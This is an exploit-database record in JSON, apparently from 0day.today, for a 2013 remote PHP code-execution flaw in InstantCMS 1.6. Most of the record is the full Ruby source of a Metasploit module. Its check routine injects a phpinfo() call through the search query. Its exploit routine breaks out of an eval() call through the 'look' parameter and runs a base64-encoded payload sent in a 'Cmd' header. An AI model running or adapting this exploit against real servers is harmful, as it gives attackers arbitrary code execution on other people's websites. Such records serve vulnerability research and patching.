Description
This Metasploit module exploits an arbitrary PHP command execution vulnerability, caused by a dangerous use of eval(), in InstantCMS version 1.6.
{"id": "1337DAY-ID-20966", "type": "zdt", "bulletinFamily": "exploit", "title": "InstantCMS 1.6 Remote PHP Code Execution Vulnerability", "description": "This Metasploit module exploits an arbitrary php command execution vulnerability, because of a dangerous use of eval(), in InstantCMS versions 1.6.", "published": "2013-07-03T00:00:00", "modified": "2013-07-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/20966", "reporter": "AkaStep", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-06T23:18:28", "viewCount": 22, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "sourceHref": "https://0day.today/exploit/20966", "sourceData": "require 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits an arbitrary php command execution vulnerability, because of a\r\n dangerous use of eval(), in InstantCMS versions 1.6.\r\n },\r\n 'Author' =>\r\n [\r\n 'AkaStep', # Vulnerability discovery and PoC\r\n 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'BID', '60816' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'InstantCMS 1.6', { } ],\r\n ],\r\n 'DisclosureDate' => 'Jun 26 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, \"The URI path of the InstantCMS page\", 
\"/\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.to_s),\r\n 'vars_get' =>\r\n {\r\n 'view' => 'search',\r\n 'query' => '${echo phpinfo()}'\r\n }\r\n })\r\n\r\n if res\r\n if res.body.match(/Build Date/)\r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n\r\n print_status(\"Executing payload...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.to_s),\r\n 'vars_get' =>\r\n {\r\n 'view' => 'search',\r\n 'query' => rand_text_alpha(3 + rand(3)),\r\n 'look' => \"#{rand_text_alpha(3 + rand(3))}\\\",\\\"\\\"); eval(base64_decode($_SERVER[HTTP_CMD]));//\"\r\n },\r\n 'headers' => {\r\n 'Cmd' => Rex::Text.encode_base64(payload.encoded)\r\n }\r\n })\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "_state": {"dependencies": 1647004802, "score": 1659766679, "epss": 1678811959}}
{}